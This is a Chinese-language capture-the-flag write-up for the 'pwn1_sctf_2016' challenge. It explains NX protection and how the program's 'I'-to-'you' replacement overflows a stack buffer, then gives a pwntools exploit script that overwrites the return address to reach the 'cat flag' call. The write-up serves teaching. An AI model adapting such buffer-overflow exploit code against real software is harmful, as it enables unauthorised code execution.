知识备用:
什么是NX:
NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。
总而言之,是一种保护的机制,我不能直接栈里面运行了。
解题思路:
查保护:
利用checksec进行查一下保护
其他的保护会在以后做题中遇到,我会再说。
找逻辑:
放入IDA中查找逻辑,发现这是一个C++的文件,所以反编译出来,也是C++的语言,之后查找字符串,找到敏感的位置。
cat flag是一个敏感的位置,说明这里是调用了system的,所以我们看一下所在的位置
可以找到这里,之后记住一下地址,之后我们去看输入的地方,有什么漏洞的存在,寻找问题 同样是字符串窗口下,可以看见一个大概提示的地方,让你输入什么。
之后找到了,之后双击,之后交叉引用到了汇编的位置反编译,之后点击vuln,你会发现反编译出来的c++源代码,也就下图
看着不舒服,把重要的挑出来看看。
printf("Tell me something about yourself: ");
fgets(&s, 32, edata);
std::string::string((int)&v5, (int)"you", (int)&v6);//v5-v6写入you
std::string::string((int)&v7, (int)"I", (int)&v8);//v7-v8写入I
replace((std::string*)&v4, (std::string*)&input, (std::string*)&v7);//输入的I变成you
std::string::operator=(&input, &v4, v0, &v5);
strcpy(&s, v1);//对比&s和v1,之后输出&s
return printf("So, %s\n", &s);
从&s开始入手,点进去&s位置在0x3C加上返回地址+4,所以需要输入0x3C+4个数的值,但是,最多可以输出31个字节的位置,或者是读取到了换行符,所以要从转换开始一个I可以转换成三个字节来算需要21个I和一个随机的字符即可到达,之后返回到cat flag的位置,那么脚本成立。
pwndbg编写:
from pwn import *
ip = ip地址
port = 端口
p = process('./pwn1_sctf_2016')#本机
p = remote(ip,port)#远程
pl = b'I'*21+b'q' + p32(0x8048f0D)
p.sendline(pl)
p.interactive()